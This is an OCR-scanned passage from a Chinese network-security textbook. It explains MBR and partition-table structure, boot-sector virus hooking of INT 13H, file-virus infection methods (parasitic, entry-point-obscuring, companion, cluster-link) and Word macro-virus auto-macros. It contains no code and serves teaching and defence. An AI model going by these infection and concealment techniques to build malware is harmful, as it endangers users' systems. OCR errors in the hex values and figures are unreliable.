01D0 41 9D 05 OF FF 38 30 5A-06 00 40 56 06 00 00 00 
01E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
01F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA 
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从 上 面 的 引导 程序 中 我 们 可 以 看 出 ， 该 引导 程序 的 功能 是 读 出 自 举 分 区 的 BOOT 程 
序 ， 并 把 控制 权 转移 给 分 区 的 BOOT 程序 ， 程 序 的 主要 作用 如 下 。 

(1) 首先 将 读 入 到 0000:7C00H 处 的 硬盘 主 引导 记录 程序 移 至 0000:0600H 处 ， 然 后 
顺序 读 入 4 个 分 区 表 的 自 举 标志 ， 以 找 出 启动 分 区 ; 如 果 找 不 到 ， 则 转 而 执行 NT 18H 中 
断 的 BOOT 异常 执行 程序 。 

(2) 当 找 到 启动 分 区 后 ， 即 检测 该 分 区 的 系统 标志 ， 若 为 32 位 FAT 表 或 16 位 FAT 
表 并 支持 13 号 中 断 的 扩展 功能 ， 就 执行 13 号 中 断 的 41 号 功能 调用 进行 安装 检验 ， 检 验 
成 功 后 就 可 以 执行 42 号 扩展 读 功能 调用 把 启动 分 区 BOOT 区 的 程序 读 入 到 内 存 的 
0000:7C00H 处 ， 如 果 读 入 成 功 就 可 以 转 至 0000:7C00H 处 执行 BOOT 程序 了 。 

(3) 如 果 上 述 BOOT 区 程序 读 入 失败 或 者 系统 标志 为 其 他 ， 就 调用 13 号 中 断 的 读 扇 
区 功能 调用 把 BOOT 读 到 0000:7C00H 处 。 当 使 用 13 号 中 断 的 读 扇 区 功能 时 ， 用 两 种 方 
式 分 别 进行 5 次 试 读 。 第 一 种 方式 是 直接 从 启动 分 区 ( 自 举 分 区 ) 的 头 扇 区 读 入 BOOT 程 
序 ， 如 果 读 取 成 功 但 结束 标志 不 是 SSAA 或 者 5 次 读 取 都 失败 ， 则 改 用 第 二 种 方式 。 如 果 
两 种 方式 均 失败 ， 则 转 到 出 错 处 理 程序 。 

下 面 我 们 再 来 看 一 下 硬盘 的 DPT 分 区 表 ， 从 上 面 我 们 知道 任何 硬盘 最 多 只 能 有 四 个 
分 区 ， 分 区 表 从 偏 移 地 址 01BEH 处 开始 ， 共 64 字 节 ， 表 中 可 存储 4 个 分 区 的 信息 ， 并 且 
每 16 字 节 代表 一 个 分 区 的 说 明 项 ， 表 8-2 列 出 了 这 16 字 节 的 含义 。 


表 8-2 ”分 区 表 结构 信息 


偏 移 量 | 长 度 说 明 

i 活动 分 区 指示 符 ， 可 能 取 值 为 80H 或 00H， 其 中 80H 表示 为 可 自 举 分 区 ( 仅 有 
一 个 )，00H 表示 其 他 分 区 

01H 1 分 区 起 始 磁头 号 

02H I 低 6 位 是 分 区 开始 的 扇 区 ， 高 2 位 是 分 区 开始 的 柱 面 的 头 两 位 

03H 1 分 区 开始 的 起 始 柱 面 号 的 低 8 位 
系统 标志 ， 可 能 取 值 有 01H、04H、05H、06H， 其 中 01H 表示 采用 的 是 12 位 

04H 1 FAT 格式 的 DOS 分 区 ，04H 表示 采用 的 是 16 位 FAT 格式 的 DOS 分 区 ，05H 
表示 扩展 DOS 分 区 ，06H 表示 DOS 系统 

05H 1 分 区 终止 头号 

06H 1 低 6 位 为 分 区 结束 的 扇 区 号 ， 头 2 位 为 结束 柱 面 号 的 前 2 位 

07H 1 分 区 结束 柱 面 号 的 低 8 位 

08H 4 本 分 区 前 的 扇 区 数 ， 低 位 字 节 在 前 

0CH 4 本 分 区 总 的 扇 区 数 ， 低 位 字 节 在 前 


下 面 为 某 个 硬盘 分 区 表 的 例子 : 

linel: 80010100061F3F983F000000AlB40400 
line2: 00 00 01 99 05 1F BF OEE0B1040040810B00 
line3: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
line4: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
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在 这 个 例子 中 ， 每 行 16 个 字 节 ， 代 表 一 个 分 区 的 说 明 ， 数 据 为 十 六 进 制 格式 。 

第 一 个 分 区 (第 一 行 数 据 ); 其 活动 分 区 指示 符 为 80H， 表 示 该 分 区 为 可 自 举 分 区 (启动 
分 区 )， 系 统 标志 为 06H， 表 示 是 DOS 系统 ， 即 C 盘 。 

第 二 个 分 区 (第 二 行 数据 ): 系统 标志 为 05H， 说 明 该 分 区 是 扩展 的 DOS 分 区 。 

第 三 、 四 个 分 区 的 数据 均 为 00H， 没 有 定义 ， 说 明 该 硬盘 仅 有 两 个 分 区 。 


2. 引导 型 病毒 的 传染 和 激活 方式 


学 习 了 计算 机 系统 启动 的 过 程 和 硬盘 引导 扇 区 的 结构 ， 我 们 就 可 以 了 解 到 引导 型 病毒 
的 基本 工作 原理 了 。 

当 计算 机 刚 开 始 启动 时 ， 计 算 机 BIOS 系统 会 将 磁盘 引导 扇 区 的 内 容 加 载 到 内 存 的 特 
定 地 址 并 开始 运行 ， 由 于 这 个 过 程 不 对 引导 记录 进行 任何 检查 ， 这 样 就 给 引导 型 病毒 传染 
磁盘 引导 扇 区 创造 了 条 件 。 引 导 型 病毒 一 般 会 将 自身 隐藏 在 引导 扇 区 中 ， 并 将 正常 的 引导 
扇 区 移 到 磁盘 的 其 他 位 置 或 用 自身 来 覆盖 原 引 导 扇 区 ， 并 修改 一 些 重要 的 中 断 向 量 ， 如 
INT 13H 等 ， 病 毒 完成 了 自身 的 引导 和 初始 化 工作 后 就 可 以 潜伏 在 内 存 中 了 ， 为 传染 打 好 
了 基础 。 由 于 上 述 过 程 发 生 在 计算 机 的 启动 过 程 ， 因 此 极 具 隐藏 性 。 

在 病毒 程序 装 入 内 存 的 同时 ， 由 于 INT 13H 的 中 断 向 量 已 被 修改 (如 图 8-4 所 示 )， 此 
时 INT 13H 的 入 口 地 址 一 般 都 是 指向 病毒 程序 的 ， 因 此 病毒 程序 就 可 以 依附 在 INT 13H 
的 中 断 程序 上 ， 这 样 任何 一 种 磁盘 操作 都 要 经 过 病毒 程序 。 换 名 话说， 一 旦 有 用 户 对 磁盘 
进行 读 写 ， 病 毒 就 会 被 激活 ， 此 时 病毒 的 传染 模块 就 开始 对 读 写 盘 进 行 传染 ， 同 时 病毒 程 
序 会 调用 原 有 的 INT 13H 服务 中 断 程序 完成 正常 的 读 写 操作 。 


读 扇 区 调用 DOS 应 用 程序 DOS 下 的 杀毒 软件 


返回 数据 
| 。 病毒 感染 后 的 INT13H 服 务 程序 | 
* 不 ， 


读 请 求 ”返回 数据 。: [原来 的 INT 13H 服 务 程序 
万 民 
读 请 求 ”返回 数据 

于 


n 
被 病毒 感染 的 扇 区 


被 感染 扇 区 的 原始 人 
的 备份 所 在 扇 区 普通 记 


寺 
怠 


区 


区 


图 8-4 引导 型 病毒 传染 时 的 隐藏 方式 


8.2.2 ”文件 型 病毒 的 技术 特点 


文件 型 病毒 主要 感染 可 执行 文件 ， 如 扩展 名 为 .COM、.EXE、.OVL 等 的 文件 ， 文 件 
型 病毒 是 一 种 主流 病毒 而 且 种 类 繁多 。 文 件 型 病毒 的 传染 必须 借助 病毒 的 载体 程序 ， 已 感 
染病 毒 的 文件 执行 速度 会 减 慢 ， 甚 至 无 法 执行 。 大 多 数 文件 型 病毒 是 常 驻 内 存 的 ， 按 其 驻 
留 内 存 的 方式 ， 可 进一步 划分 为 高 端 驻 留 型 、 常 规 驻 留 型 、 内 存 控制 链 驻 留 型 、 设 备 程序 
补丁 驻 留 型 和 不 驻 留 内 存 型 等 。 
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文件 型 病毒 通常 在 打开 文件 的 时 候 将 文件 的 内 容 恢复 到 未 感染 的 状态 ， 在 关闭 文件 的 
时 候 重新 进行 感染 。 由 于 访问 文件 的 方式 和 方法 很 多 ， 所 以 实现 完全 的 文件 型 病毒 隐藏 是 
一 件 非 常 困难 的 事情 。 一 般 较 完善 的 隐藏 技术 至 少 应 该 包括 如 图 8-5 所 示 的 几 个 方面 。 


BIOS INT 13H 2 
(直接 磁盘 访问 ) 隐藏 病毒 扇 


DOS INT21 调 用 


列 目录 功能 列 目录 时 显示 感染 
(FindFirst、 FindNext) 前 的 文件 大 小 

读 写 功能 读 写 文件 看 到 正常 
(Read、 Write) 的 文件 内 容 

执行 功能 

(Ee | 热 和 或 者 搜索 时 隐 
其 他 功能 

(rename 等 ) 

' Windows 操 作 系 统 下 ， 支 持 长 在 支持 长 文件 名 的 
文件 名 的 扩展 DOC 调 用 系统 中 隐藏 病毒 


8-5 文件 型 病毒 隐藏 性 要 求 示意 图 


通常 当 用 户 运行 带 毒 的 文件 时 ， 首 先 会 执行 病毒 程序 ， 然 后 再 执行 原文 件 的 内 容 ， 病 
毒 程序 由 于 优先 获得 了 系统 的 控制 权 ， 便 可 以 将 自身 驻 留 在 内 存 中 并 处 于 激活 状态 ， 这 样 
一 旦 传染 条 件 满足 ， 病 毒 程序 就 会 对 其 他 文件 进行 传染 或 者 破坏 。 

文件 病毒 会 以 多 种 不 同方 式 连接 它们 的 目标 程序 文件 ， 将 病毒 代码 附加 到 一 个 实际 存 
在 的 可 执行 文件 中 的 主要 途径 有 以 下 4 种 : 

e@ ”覆盖 已 存在 的 程序 代码 ，; 

e ”在 程序 开头 增加 代码 ; 

e 在 程序 末尾 增加 代码 ; 

将 病毒 程序 代码 插入 命令 中 ， 当 执行 合法 程序 时 激活 病毒 程序 。 

感染 文件 的 病毒 程序 一 般 都 会 在 目标 文件 中 做 一 些 必 要 的 变动 ， 如 果 目 标 文件 中 含有 
常规 的 DOS 调用 ， 建 立 文件 日 期 的 数据 就 会 被 改变 。 如 果 在 文件 上 添加 代码 ， 文 件 的 长 
度 就 会 改变 。 即 使 文件 区 被 覆盖 ， 而 且 文件 长 度 未 发 生变 化 ， 但 奇偶 校 验 、 循 环 元 余 校 验 
以 及 Hamming 代码 校 验 等 也 会 发 现 文件 实际 上 发 生 的 一 些 变动 。 因 此 ， 病 毒 设计 者 会 尽 
可 能 地 掩饰 病毒 对 文件 造成 的 改动 ， 如 病毒 可 以 避免 改变 文件 的 创建 日 期 等 ， 也 可 以 覆盖 
程序 源 代码 ， 这 样 文件 长 度 就 不 会 增加 ; 另外 也 可 以 使 病毒 在 调用 系统 信息 时 避 开 操作 系 
统 ， 将 数据 值 原封 不 动 地 返回 。 

根据 文件 型 病毒 的 不 同 工 作 机 理 ， 又 可 分 为 如 下 几 种 常见 的 病毒 类 型 。 


1. 寄生 型 病毒 


这 类 病毒 在 感染 的 时 候 ， 会 将 病毒 代码 附加 到 正常 程序 中 ， 并 将 原来 程序 的 功能 全 部 
或 部 分 保 量 。 根 据 病 毒 代码 加 入 方式 的 不 同 ， 寄 生 型 病毒 又 可 以 细 分 为 头 寄生 、 尾 寄生 、 


Xl 
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中 间 插 入 和 空洞 利用 4 种 。 

1) “ 头 寄生 

实现 头 寄生 的 方法 主要 有 两 种 : 

一 种 方法 是 将 正常 程序 的 文件 头 部 分 拷贝 到 程序 的 末尾 ， 然 后 用 病毒 代码 覆盖 文件 
头 ; 另 一 种 方法 是 生成 一 个 新 的 文件 ， 在 这 个 新 文件 的 头 位 置 写 入 病毒 代码 ， 然 后 将 正常 
的 可 执行 文件 写 在 病毒 代码 的 后 面 ， 再 用 新 的 文件 替换 掉 原 有 的 正常 文件 。 从 这 两 种 方法 
的 实现 上 可 以 看 出 ， 使 用 “ 头 寄 生 ” 方 式 的 病毒 基本 上 感染 的 是 批 处 理 文件 和 COM 格式 
的 文件 ， 因 为 这 些 文件 在 运行 的 时 候 不 需要 重新 定位 ， 所 以 可 以 任意 调换 代码 的 位 置 而 不 
发 生 错误 。 随 着 病毒 技术 的 不 断 提高 ， 很 多 EXE 文件 也 可 以 采用 头 寄 生 的 方式 ， 为 使 这 
些 带 毒 文 件 仍 能 正常 运行 ， 病 毒 会 在 执行 前 首先 剥离 出 原来 没有 感染 过 的 文件 ， 此 时 执行 
的 文件 是 一 个 正常 的 文件 ， 当 执行 完毕 后 病毒 再 进行 一 次 感染 ， 这 样 就 可 以 保证 硬盘 上 的 
文件 仍 处 于 感染 状态 了 。 

2)” 尾 寄生 

由 于 头 寄生 方法 不 可 避免 地 会 遇 到 重新 定位 的 问题 ， 所 以 最 常用 的 寄生 方法 是 采用 尾 
寄生 的 方式 ， 即 直接 将 病毒 代码 附加 到 可 执行 程序 的 尾部 ， 这 种 方式 非常 简单 。 以 DOS 
环境 下 的 .COM 可 执行 文件 为 例 ， 由 于 .COM 文件 仅 是 一 种 简单 的 二 进 制 代 码 ， 没 有 任何 
结构 信息 ， 所 以 可 以 直接 将 病毒 代码 附加 到 程序 的 尾部 ， 然 后 改动 文件 开始 的 3 个 字 节 为 
跳 转 指令 ， 这 样 .COM 文件 执行 时 ， 会 首先 利用 跳 转 指令 跳 转 到 病毒 代码 的 开始 地 址 。 

对 于 EXE 文件 ， 相 对 来 说 处 理 方法 复杂 一 些 ， 以 DOS 环境 下 的 EXE 文件 为 例 ， 一 
种 方法 是 将 EXE 格式 文件 转换 成 .COM 文件 来 进行 感染 ， 另 一 种 方式 是 修改 EXE 文件 的 
文件 头 ， 需 要 修改 的 信息 包括 “代码 的 开始 地 址 ”、“ 可 执行 文件 的 长 度 ”、“ 文 件 的 
CRC 校 验 值 ”等 ， 另 外 堆栈 寄存 器 的 指针 也 可 能 被 修改 。 对 于 Windows 下 的 EXE 文件 ， 
需要 修改 的 是 PE 或 者 NE 的 文件 头 ， 需 要 修改 的 信息 包括 “程序 入 口 地 址 ”、“ 段 的 开 
始 地 址 ”和 “ 段 属性 ”等 ， 相 对 于 修改 DOS 下 EXE 文件 的 头 来 说 ， 修 改 Windows 下 的 
EXE 文件 头 要 复杂 得 多 。 另 外 ， 如 果 病 毒 感染 的 是 DOS 环境 下 的 设备 驱动 程序 .SYS 文 
件 ， 病 毒 就 会 在 DOS 启动 后 立刻 进入 系统 ， 这 样 对 于 随后 加 载 的 任何 软件 ， 甚 至 杀毒 软 
件 来 说 ， 所 有 的 文件 操作 都 会 在 病毒 的 监控 下 ， 因 此 这 种 方式 的 危害 和 隐藏 性 更 大 。 

3) “中间 插入 

这 种 方式 ， 病 毒 会 将 自己 插入 到 被 感染 的 程序 中 ， 可 以 整 段 插入 ， 也 可 以 分 段 插入 ， 
有 的 病毒 采用 压缩 原来 代码 的 方式 来 保证 被 感染 文件 的 大 小 不 变 。 由 于 这 种 方式 对 病毒 程 
序 的 编写 要 求 很 高 ， 因 此 采用 中 间 寄 生 的 病毒 相对 来 说 较 少 。 

4) ”空洞 利用 

对 于 Windows 视窗 环境 下 的 可 执行 文件 ， 由 于 其 程序 结构 比较 复杂 ， 而 文件 中 一 般 
都 会 有 很 多 没有 使 用 的 部 分 ， 因 此 病毒 设计 者 可 以 寻找 这 些 没有 使 用 的 空 段 或 某 个 段 的 空 
闲 部 分 (一 般 位 于 每 个 段 的 最 后 部 分 )， 然 后 将 病毒 代码 分 散 到 其 中 ，CIH 病毒 采用 的 就 是 
这 种 方式 。 

寄生 型 病毒 精确 地 诠释 了 计算 机 病毒 的 本 质 ， 即 寄生 在 宿主 程序 上 ， 并 且 不 破坏 宿主 
程序 的 正常 功能 ， 所 以 寄生 病毒 的 设计 者 都 希望 能 够 完整 地 保存 原来 正常 程序 的 所 有 内 
容 ， 因 此 寄生 型 病毒 一 般 都 是 可 以 安全 清除 的 。 
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2. 覆盖 型 病毒 


这 种 方式 比较 直接 ， 也 没有 多 么 高 明 的 技术 ， 病 毒 设计 者 往往 直接 采用 替换 的 方式 ， 
用 病毒 程序 覆盖 被 感染 的 程序 。 显 然 ， 这 种 病毒 的 技术 含量 很 低 ， 也 不 可 能 被 广泛 的 
3. 无 入 口 点 型 病毒 


这 类 病毒 并 不 是 真正 没有 入 口 点 ， 而 是 在 被 感染 程序 执行 的 时 候 ， 没 有 立刻 跳 转 到 病 
毒 的 代码 处 开始 执行 。 即 它 不 需要 在 .COM 型 文件 的 开始 位 置 放 置 跳 转 指令 ， 也 不 需要 改 
变 EXE 文件 的 程序 入 口 点 。 这 种 类 型 的 病毒 代码 可 以 无 声 无 息 地 潜伏 在 被 感染 的 程序 
中 ， 并 在 适当 的 条 件 下 才 会 被 触发 执行 ， 因 此 采用 这 种 方式 感染 的 病毒 会 非常 隐蔽 。 由 于 
X86 机 器 的 指令 并 不 是 等 长 的 ， 因 此 无 法 断定 什么 地 方 开始 的 是 一 条 有 效 的 、 可 以 执行 到 
的 指令 。 那 么 这 种 类 型 病毒 的 设计 就 必须 面临 一 个 问题 ， 如 何在 病毒 触发 条 件 满足 时 跳 转 
到 病毒 代码 处 。 病 毒 的 设计 者 们 采用 了 很 多 方式 ， 其 中 最 常见 的 方法 是 借助 特定 的 初始 化 
代码 来 跳 转 到 病毒 代码 处 。 由 于 当前 程序 在 编写 时 都 会 使 用 一 些 基本 的 库 函 数 ， 例 如 字符 
串 处 理 、 基 本 的 输入 输出 等 。 对 于 这 样 的 程序 ， 编 译 器 往往 会 增加 一 些 代 码 来 对 这 些 库 进 
行 初始 化 ， 这 样 病 毒 就 可 以 通过 寻找 特定 的 初始 化 代码 ， 并 修改 这 段 代码 来 达到 跳 转 的 目 
的 ， 例 如 “ 纽 克 瑞 希 尔 ” 病 毒 就 采用 的 是 这 种 方法 。 


4. 伴随 型 病毒 


这 种 类 型 的 病毒 一 般 不 改变 被 感染 的 文件 ， 而 是 为 该 文件 创建 一 个 伴随 文件 ， 这 个 伴 
随 文件 就 是 病毒 文件 。 当 执行 被 感染 文件 时 ， 会 首先 执行 这 个 带 毒 的 伴随 文件 。 其 中 一 种 
伴随 型 病毒 利用 的 是 DOS 执行 文件 的 一 个 特性 ， 即 当 同 一 个 目录 中 同时 存在 同名 的 后 缀 
名 为 .COM 的 文件 和 后 级 名 为 .EXE 的 文件 时 ， 会 首先 执行 后 缀 名 为 .COM 的 文件 。 例 如 ， 
DOS 操作 系统 带 了 一 个 XCOPY.EXE 程序 ， 如 果 在 DOS 目录 中 还 有 一 个 叫做 XCOPY. 
COM 的 文件 ， 那 么 当 你 融入“XCOPY” 命 令 时 ， 实 际 上 执行 的 就 是 病毒 文件 XCOPY. 
COM。 还 有 一 种 伴随 方式 是 将 原来 的 文件 改名 ， 例 如 ， 将 XCOPY.EXE 文件 改 成 
XCOPY.OLD 文件 ， 然 后 生成 一 个 新 的 XCOPY.EXE( 实 际 上 是 病毒 文件 )， 这 样 当 敲 入 
“XCOPY ”命令 时 ， 首 先 执行 的 同样 是 病毒 文件 ， 然 后 病毒 文件 再 去 加 载 原来 的 程序 
XCOPY.OLD 来 执行 。 

还 有 一 种 方式 利用 了 操作 系统 的 环境 变量 设置 ， 因 为 操作 系统 一 般 会 首先 在 环境 变量 
中 的 路 径 信息 中 搜索 程序 位 置 ， 例 如 Windows 系统 首先 会 搜索 操作 系统 安装 的 系统 目 
录 ， 这 样 病毒 就 可 以 在 最 先 搜索 的 目录 中 存放 和 感染 文件 同名 的 可 执行 文件 ， 例 如 “ 尼 姆 
达 ” 病 毒 就 是 大 量 采用 这 种 方法 来 进行 传染 的 。 

5. 文件 蠕虫 


文件 蠕虫 和 伴随 型 病毒 比较 相似 ， 但 是 文件 蠕虫 并 不 利用 路 径 的 优先 顺序 或 者 其 他 手 
段 来 执行 ， 这 种 病毒 的 早期 版 本 只 是 生成 一 个 具有 “ INSTALLBAT ”或 者 
“SETUP.EXE” 等 名 字 的 文件 (起 始 就 是 病毒 文件 的 拷贝 )， 诱 使 用 户 在 看 到 这 些 文件 后 去 
主动 执行 。 还 有 一 些 蠕虫 可 以 针对 压缩 文件 来 传染 ， 它 们 首先 会 扫描 整个 硬盘 中 的 压缩 文 
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件 ， 然 后 将 自己 的 病毒 体 直接 植 入 到 压缩 包 中 。 
6. 链接 病毒 


由 于 硬盘 上 每 一 个 扇 区 的 大 小 一 般 只 有 512 个 字 节 ， 如 果 一 个 文件 分 布 在 很 多 的 扇 区 
中 ， 要 想 完整 的 在 文件 分 配 表 中 描述 出 这 个 文件 占用 扇 区 的 情况 ， 将 会 占用 很 多 的 目录 空 
间 ， 例 如 1 个 1MB 的 文件 ， 将 会 需要 2KB 的 空间 来 表示 文件 占用 扇 区 的 情况 。 因 此 所 有 
的 文件 系统 都 引入 了 簇 的 概念 ， 简 单 地 说 ， 一 个 簇 就 是 很 多 个 扇 区 ， 但 是 组 合 在 一 起 作为 
文件 分 配 的 最 小 单位 ， 秘 的 大 小 有 4KB、16KB、32KB 等 多 种 类 型 。 链 接 病 毒 就 是 将 自 
己 隐 藏 在 文件 系统 的 某 个 簇 中 ， 然 后 通过 修改 文件 分 配 表 ， 使 目录 区 中 文件 的 开始 簇 指向 
病毒 代码 的 入 口 点 ， 这 种 感染 方式 的 特点 是 在 每 一 个 逻辑 驱动 器 上 只 有 一 份 病毒 的 拷贝 。 
由 于 这 类 病毒 并 没有 在 硬盘 上 生成 一 个 专门 的 病毒 文件 ， 因 此 隐蔽 性 较 好 。 链 接 病毒 的 数 
量 相对 来 说 较 少 ， 其 典型 代表 是 在 中 国 出 现 的 鼎鼎 大 名 的 “目录 2” 病 毒 。 

另外 ， 在 Windows NT 和 Windows 2000 操作 系统 中 ， 还 有 一 种 早期 的 链接 病毒 ， 这 
种 病毒 只 存在 于 NTFS 文件 系统 的 逻辑 磁盘 上 ， 使 用 了 NTFS 文件 系统 的 隐藏 流 来 存放 病 
毒 代码 ， 被 这 种 病毒 感染 之 后 ， 杀 毒 软件 很 难 找到 病毒 代码 并 且 安全 的 清除 。 


7. 对 象 文件 、 库 文件 和 源 代码 病毒 


这 些 类 型 的 病毒 数量 非常 少 ， 它 们 主要 是 通过 感染 编译 器 生成 的 中 间 对 象 文件 (OBJ 
文件 )， 或 者 编译 器 使 用 的 库 文件 (LIB) 文 件 来 达到 病毒 传播 的 目的 ， 由 于 这 些 文件 不 是 直 
接 的 可 执行 文件 ， 所 以 病毒 感染 这 些 文件 之 后 并 不 能 直接 进行 传染 ， 必 须 使 用 被 感染 的 
OBJ 或 者 LIB 链接 生成 EXE(COM) 程 序 之 后 ， 生 成 包含 了 病毒 的 可 执行 文件 才能 完成 实 
际 的 感染 过 程 。 而 源 代码 病毒 是 采用 直接 对 源 代码 进行 修改 的 方式 ， 在 源 代码 文件 中 增加 
病毒 的 内 容 ， 例 如 搜索 所 有 后 缀 名 是 “.C” 的 文件 ， 如 果 在 里 面 找到 “main(” 形 式 的 字 
符 串 ， 并 在 函数 体 中 加 入 病毒 代码 ， 这 样 编译 出 来 的 文件 就 包括 了 病毒 。 


8.2.3 ” 宏 病 毒 的 技术 特点 


宏 是 微软 公司 为 其 Office 软件 包 设 计 的 一 种 特殊 功能 ， 目 的 为 用 户 提供 一 种 自动 化 的 
任务 实现 机 制 ， 宏 是 将 一 系列 的 命令 和 指令 组 合 在 一 起 形成 的 一 个 集合 。 宏 病毒 就 是 利用 
了 宏 的 这 种 特性 ， 将 病毒 寄存 在 文档 或 模板 的 宏 中 ， 一 旦 打开 这 样 的 文档 ， 其 中 的 宏 就 会 
被 执行 ， 于 是 宏 病 毒 随机 也 会 被 激活 ， 并 驻 留 在 Normal 模板 上 。 


1 什么 是 “ 宏 ” 


以 微软 的 Office Word 为 例 ， 经 常 使 用 Word 的 用 户 恐 怕 对 通用 模板 Normal.dot 并 不 
会 陌生 ， 这 个 模板 里 就 包含 了 基本 的 宏 。 一 旦 用 户 启动 了 Word， 就 会 自动 运行 
Normal.dot 文件 。 宏 可 以 帮助 Word 重复 进行 某 项 任务 ， 例 如 让 每 个 文档 的 页 眉 或 页 脚 处 
都 自动 加 入 LOGO 或 用 户 的 联系 方式 。 另 外 ， 除 了 Normal.dot，Word 还 提供 了 很 多 其 他 
的 模板 ， 如 传真 、 邮 件 、 备 忘 录 和 简历 等 。Office 中 为 Word 提供 了 两 种 创建 宏 的 方法 : 
一 种 是 宏 录 制 器 另 一 种 是 Visual Basic 编辑 器 。 宏 将 一 系列 的 Word 命令 和 指令 组 合 在 
一 起 ， 形 成 一 个 命令 ， 以 实现 执行 任务 的 自动 化 。 


274 网 络 安全 与 管理 


2. 宏 病毒 的 作用 机 制 


仍 以 Word 为 例 ， 其 模板 作为 Word 文档 的 基 类 ， 一 般 包 括 宏 、 菜 单 、 格 式 等 元 素 ， 
而 文档 则 会 继承 模板 中 定义 的 各 种 属性 。Word 在 处 理 文档 时 常 需要 同时 进行 各 种 不 同 的 
操作 ， 例 如 打开 文件 、 关 闭 文件 、 读 取 数 据 或 者 存储 打印 等 。 实 际 上 ，Word 的 每 一 种 动 
作 都 对 应 着 特定 的 宏 命令 ,例如 存储 文件 与 “FileSave” 相 对 应 ， 打 印 文件 与 “FilePrint” 
相对 应 等 。 而 Word 软件 在 打开 一 个 文档 时 ， 会 首先 检查 是 否 有 AutoOpen 宏 的 存在 ， 假 
如 有 这 样 的 宏 存 在 的 话 ，Word 就 会 自动 启动 这 个 宏 ( 除 非 已 经 在 Word 中 设置 了 宏 无 效 ); 
另外 ， 当 一 个 文件 关闭 时 ， 如 果 存 在 AutoClose 这 个 宏 ， 系 统 也 会 自动 执行 。 表 8-3 列 出 
了 Word 软件 中 最 重要 的 几 种 自动 宏 。 


表 8-3 Word 可 以 识别 的 自动 宏 


宏 名 宏 运 行 的 触发 条 件 
AutoOpen 每 次 打开 已 有 文档 时 
AutoNew 每 次 新 建文 档 时 
AutoExec 启动 Word 时 
AutoClose 每 次 关闭 文档 时 
AutoExit 退出 Word 时 


通常 ，Word 的 宏 病 毒 至 少 要 包含 一 个 以 上 的 自动 宏 ,例如 AutoOpen、AutoClose、 
AutoExec 、AutoExit 和 AutoNew 等 ， 或 者 是 一 个 以 上 的 标准 宏 ， 例如 FileOpen、 
FileSave、FileSaveAs 等 。 如 果 某 个 Word 文档 感染 了 这 类 宏 病 毒 ， 则 当 对 该 Word 文档 进 
行 操作 时 ， 就 会 启动 病毒 代码 。 一 般 由 自动 宏 或 标准 宏 构 成 的 宏 病 毒 ， 其 内 部 代码 都 具有 
把 带 病 毒 的 宏 移 植 到 通用 宏 的 功能 ， 以 此 来 实现 对 其 他 文件 的 传染 。 当 Word 系统 退出 
时 ， 病 毒 会 自动 将 所 有 带 毒 的 通用 宏 都 保存 到 模板 文件 中 ， 通 常 为 Normal.dot 文件 。 这 
样 ， 当 Word 系统 再 次 启动 时 ， 它 又 会 自动 把 所 有 通用 宏 通 过 模板 加 载 进来 ， 这 些 宏 中 当 
然 也 包含 了 病毒 宏 。 因 此 ， 一 旦 Word 软件 遭受 了 宏 病 毒 的 侵扰 ， 对 于 以 后 创建 和 打开 的 
任何 文档 都 会 受到 感染 。 同 时 由 于 Word 允许 对 宏 本 身 进行 加 密 操作 ， 因 此 有 许多 宏 病 毒 
是 经 过 加 密 处 理 的， 不 经 过 特殊 处 理 是 无 法 直接 进行 编辑 或 观察 的 ， 这 也 是 很 多 宏 病 毒 无 
法 手工 查 杀 的 主要 原因 。 

目前 ， 几 乎 所 有 已 知 的 宏 病毒 都 沿用 了 相同 的 作用 机 理 ， 即 如 果 Word 软件 在 打开 一 
个 染 毒 文件 时 遭受 感染 ， 则 其 后 所 有 新 创建 或 打开 的 Word 文件 都 会 被 感染 ， 因 此 宏 病毒 
也 非常 流行 。 

3. 宏 病 毒 的 主要 技术 特点 


当 宏 病毒 感染 Word 软件 时 ， 该 类 型 病毒 通常 会 蔡 换 或 插入 进 原来 的 正常 宏 ， 并 通过 
这 些 宏 所 关联 的 文件 操作 获取 对 文件 交换 的 控制 。 一 般 宏 病 毒 主要 寄生 在 AutoOpen、 
AutoClose 和 AutoNew 这 3 个 宏 中 ， 其 引导 、 传 染 、 表 现 或 破坏 均 通 过 宏 指 令 来 完成 
的 。 当 某 项 功能 被 调用 时 ， 相 应 的 病毒 宏 就 会 自 夺 控制 权 ， 实 施 病毒 所 定义 的 非法 操作 ， 
宏 病 毒 在 感染 一 个 文档 时 ， 首 先 要 把 文档 转换 成 模板 格式 ， 然 后 把 所 有 病毒 宏 (包括 自动 
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宏 ) 复 制 到 该 文档 中 ， 并 且 被 转换 成 模板 格式 后 的 染 毒 文件 无 法 转 存 为 任何 其 他 格式 。 含 
有 自动 宏 的 宏 病 毒 染 毒 文 档 ， 在 被 其 他 计算 机 的 Word 软件 打开 时 ， 会 自动 感染 这 些 计算 
机 上 的 Word 软件 。 例 如 病毒 捕获 并 修改 了 FileOpen 宏 ， 那 么 它 将 感染 每 一 个 被 打开 的 
Word 文件 。 

因此 ， 我 们 可 以 看 出 宏 病 毒 具 有 的 一 些 主要 技术 特点 如 下 。 

1) “传播 速度 极 快 

由 于 宏 病 毒 一 般 是 通过 Word 文档 及 其 .dot 模板 进行 自我 复制 及 传播 ， 而 Word 文档 
又 是 目前 最 流行 的 文件 类 型 ， 因 此 给 宏 病 毒 的 传播 带 了 很 多 便利 。 特 别 是 随 着 Internet 网 
络 的 普及 和 发 展 ， 大 量 Email 携带 了 Office 文档 附件 的 Email 信件 更 为 宏 病毒 的 传播 铺 平 
了 道路 。 

2) ” 宏 病毒 的 开发 和 变种 技术 实现 简单 

通常 以 往 的 病毒 都 是 以 二 进 制 的 计算 机 机 器 码 形式 出 现 的 ， 而 宏 病 毒 可 以 以 人 们 容易 
阅读 的 源 代码 宏 语 言 Word Basic 形式 出 现 ， 所 以 编写 和 修改 宏 病 毒 比 以 往 其 他 病毒 要 容 
易 得 多 。 

3) ”造成 破坏 的 可 能 性 极 大 

由 于 宏 病 毒 可 以 使 用 Visual Basic 或 Word Basic 语言 编写 ， 而 这 种 语言 提供 了 许多 系 
统 级 的 底层 调用 功能 ， 如 直接 使 用 DOS 系统 命令 、 调 用 Windows 的 API 或 者 调用 DDE 
或 DLL 等 文件 ， 这 些 操作 都 可 能 会 对 计算 机 系统 直接 构成 威胁 ， 而 Word 系统 在 指令 安 
